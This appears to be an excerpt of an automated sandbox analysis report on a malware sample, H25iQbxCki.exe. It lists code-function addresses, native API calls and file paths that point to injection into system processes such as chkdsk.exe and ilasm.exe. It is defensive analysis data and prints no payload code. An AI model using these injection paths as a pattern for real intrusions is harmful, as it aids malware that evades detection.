Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04587450 NtCreateFile,	12_2_04587450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_045875B0 NtReadFile,	12_2_045875B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04587690 NtDeleteFile,	12_2_04587690
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04587720 NtClose,	12_2_04587720
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04587880 NtAllocateVirtualMemory,	12_2_04587880

Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B88CAB9	0_2_00007FFD9B88CAB9
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B88211D	0_2_00007FFD9B88211D
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B88CF41	0_2_00007FFD9B88CF41
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B885608	0_2_00007FFD9B885608
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B885620	0_2_00007FFD9B885620
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B889D58	0_2_00007FFD9B889D58
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B895CBC	0_2_00007FFD9B895CBC
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B881158	0_2_00007FFD9B881158
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B881155	0_2_00007FFD9B881155
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B89156A	0_2_00007FFD9B89156A
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B895D20	0_2_00007FFD9B895D20
Source: C:\Users\user\Desktop\H25iQbxCki.exe	Code function: 0_2_00007FFD9B96026B	0_2_00007FFD9B96026B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00401ABA	5_2_00401ABA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00401000	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_004028DD	5_2_004028DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_004028E0	5_2_004028E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00403090	5_2_00403090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00401200	5_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00404B97	5_2_00404B97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00402BA0	5_2_00402BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_0042D543	5_2_0042D543
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_0040FD33	5_2_0040FD33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_0041661E	5_2_0041661E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00416623	5_2_00416623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_004026AE	5_2_004026AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00401EB0	5_2_00401EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_004026B0	5_2_004026B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_00403750	5_2_00403750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_0040FF53	5_2_0040FF53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_0040DFCA	5_2_0040DFCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_0040DFD3	5_2_0040DFD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C80591	5_2_05C80591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0535	5_2_05BC0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C6E4F6	5_2_05C6E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C72446	5_2_05C72446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBC7C0	5_2_05BBC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0770	5_2_05BC0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE4750	5_2_05BE4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDC6E0	5_2_05BDC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C781CC	5_2_05C781CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C801AA	5_2_05C801AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C48158	5_2_05C48158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB0100	5_2_05BB0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5A118	5_2_05C5A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C803E6	5_2_05C803E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCE3F0	5_2_05BCE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7A352	5_2_05C7A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C402C0	5_2_05C402C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60274	5_2_05C60274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD8DBF	5_2_05BD8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBADE0	5_2_05BBADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCAD00	5_2_05BCAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB0CF2	5_2_05BB0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C60CB5	5_2_05C60CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0C00	5_2_05BC0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C3EFA0	5_2_05C3EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB2FC8	5_2_05BB2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C34F40	5_2_05C34F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BE0F30	5_2_05BE0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C02F28	5_2_05C02F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7EEDB	5_2_05C7EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD2E90	5_2_05BD2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7CE93	5_2_05C7CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7EE26	5_2_05C7EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC0E59	5_2_05BC0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC29A0	5_2_05BC29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C8A9A6	5_2_05C8A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BD6962	5_2_05BD6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BA68B8	5_2_05BA68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BEE8F0	5_2_05BEE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC2840	5_2_05BC2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCA840	5_2_05BCA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C76BD7	5_2_05C76BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7AB40	5_2_05C7AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BBEA80	5_2_05BBEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5D5B0	5_2_05C5D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C77571	5_2_05C77571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BB1460	5_2_05BB1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7F43F	5_2_05C7F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7F7B0	5_2_05C7F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C716CC	5_2_05C716CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BCB1B0	5_2_05BCB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C8B16B	5_2_05C8B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAF172	5_2_05BAF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF516C	5_2_05BF516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C6F0CC	5_2_05C6F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7F0E0	5_2_05C7F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C770E9	5_2_05C770E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC70C0	5_2_05BC70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C0739A	5_2_05C0739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7132D	5_2_05C7132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BAD34C	5_2_05BAD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC52A0	5_2_05BC52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C612ED	5_2_05C612ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDD2F0	5_2_05BDD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDB2C0	5_2_05BDB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDFDC0	5_2_05BDFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C71D5A	5_2_05C71D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C77D73	5_2_05C77D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC3D40	5_2_05BC3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7FCF2	5_2_05C7FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C39C32	5_2_05C39C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC1F92	5_2_05BC1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7FFB1	5_2_05C7FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7FF09	5_2_05C7FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC9EB0	5_2_05BC9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC9950	5_2_05BC9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDB950	5_2_05BDB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BC38E0	5_2_05BC38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C2D800	5_2_05C2D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C35BF0	5_2_05C35BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BDFB80	5_2_05BDFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BFDBF9	5_2_05BFDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7FB76	5_2_05C7FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C6DAC6	5_2_05C6DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C05AA0	5_2_05C05AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C5DAAC	5_2_05C5DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C77A46	5_2_05C77A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C7FA49	5_2_05C7FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05C33A6C	5_2_05C33A6C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05030535	12_2_05030535
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E7571	12_2_050E7571
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050F0591	12_2_050F0591
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050CD5B0	12_2_050CD5B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EF43F	12_2_050EF43F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E2446	12_2_050E2446
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05021460	12_2_05021460
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050DE4F6	12_2_050DE4F6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05054750	12_2_05054750
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05030770	12_2_05030770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EF7B0	12_2_050EF7B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0502C7C0	12_2_0502C7C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E16CC	12_2_050E16CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0504C6E0	12_2_0504C6E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05020100	12_2_05020100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050CA118	12_2_050CA118
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050B8158	12_2_050B8158
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050FB16B	12_2_050FB16B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0506516C	12_2_0506516C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0501F172	12_2_0501F172
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050F01AA	12_2_050F01AA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0503B1B0	12_2_0503B1B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E81CC	12_2_050E81CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050DF0CC	12_2_050DF0CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050370C0	12_2_050370C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E70E9	12_2_050E70E9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EF0E0	12_2_050EF0E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E132D	12_2_050E132D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0501D34C	12_2_0501D34C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EA352	12_2_050EA352
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0507739A	12_2_0507739A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050F03E6	12_2_050F03E6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0503E3F0	12_2_0503E3F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050D0274	12_2_050D0274
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050352A0	12_2_050352A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0504B2C0	12_2_0504B2C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050B02C0	12_2_050B02C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050D12ED	12_2_050D12ED
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0504D2F0	12_2_0504D2F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0503AD00	12_2_0503AD00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05033D40	12_2_05033D40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E1D5A	12_2_050E1D5A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E7D73	12_2_050E7D73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05048DBF	12_2_05048DBF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0504FDC0	12_2_0504FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0502ADE0	12_2_0502ADE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05030C00	12_2_05030C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050A9C32	12_2_050A9C32
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050D0CB5	12_2_050D0CB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05020CF2	12_2_05020CF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EFCF2	12_2_050EFCF2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EFF09	12_2_050EFF09
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05072F28	12_2_05072F28
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05050F30	12_2_05050F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050A4F40	12_2_050A4F40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05031F92	12_2_05031F92
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050AEFA0	12_2_050AEFA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EFFB1	12_2_050EFFB1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05022FC8	12_2_05022FC8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EEE26	12_2_050EEE26
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05030E59	12_2_05030E59
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05042E90	12_2_05042E90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050ECE93	12_2_050ECE93
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05039EB0	12_2_05039EB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EEEDB	12_2_050EEEDB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05039950	12_2_05039950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0504B950	12_2_0504B950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05046962	12_2_05046962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050329A0	12_2_050329A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050FA9A6	12_2_050FA9A6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0509D800	12_2_0509D800
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05032840	12_2_05032840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0503A840	12_2_0503A840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050168B8	12_2_050168B8
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050338E0	12_2_050338E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0505E8F0	12_2_0505E8F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EAB40	12_2_050EAB40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EFB76	12_2_050EFB76
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0504FB80	12_2_0504FB80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E6BD7	12_2_050E6BD7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050A5BF0	12_2_050A5BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0506DBF9	12_2_0506DBF9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050EFA49	12_2_050EFA49
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050E7A46	12_2_050E7A46
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050A3A6C	12_2_050A3A6C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0502EA80	12_2_0502EA80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050CDAAC	12_2_050CDAAC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05075AA0	12_2_05075AA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050DDAC6	12_2_050DDAC6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04571110	12_2_04571110
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0456C560	12_2_0456C560
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0456A5D7	12_2_0456A5D7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0456A5E0	12_2_0456A5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_045611A4	12_2_045611A4
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_0456C340	12_2_0456C340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04572C30	12_2_04572C30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04572C2B	12_2_04572C2B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_04589B50	12_2_04589B50
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B5CAA2	16_2_02B5CAA2
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B5CA99	16_2_02B5CA99
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B5EA22	16_2_02B5EA22
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B650F2	16_2_02B650F2
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B650ED	16_2_02B650ED
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B7C012	16_2_02B7C012
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B5E802	16_2_02B5E802
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B53666	16_2_02B53666
Source: C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe	Code function: 16_2_02B635D2	16_2_02B635D2

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0509EA12 appears 86 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0501B970 appears 250 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05065130 appears 36 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 05077E54 appears 93 times
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 050AF290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: String function: 05C2EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: String function: 05BAB970 appears 254 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: String function: 05C07E54 appears 95 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: String function: 05BF5130 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: String function: 05C3F290 appears 103 times

Source: C:\Users\user\Desktop\H25iQbxCki.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7420 -s 1344

Source: H25iQbxCki.exe

Static PE information: No import functions for PE file found

Source: H25iQbxCki.exe, 00000000.00000002.1927554553.000002148016B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNativeMethods.dll" vs H25iQbxCki.exe
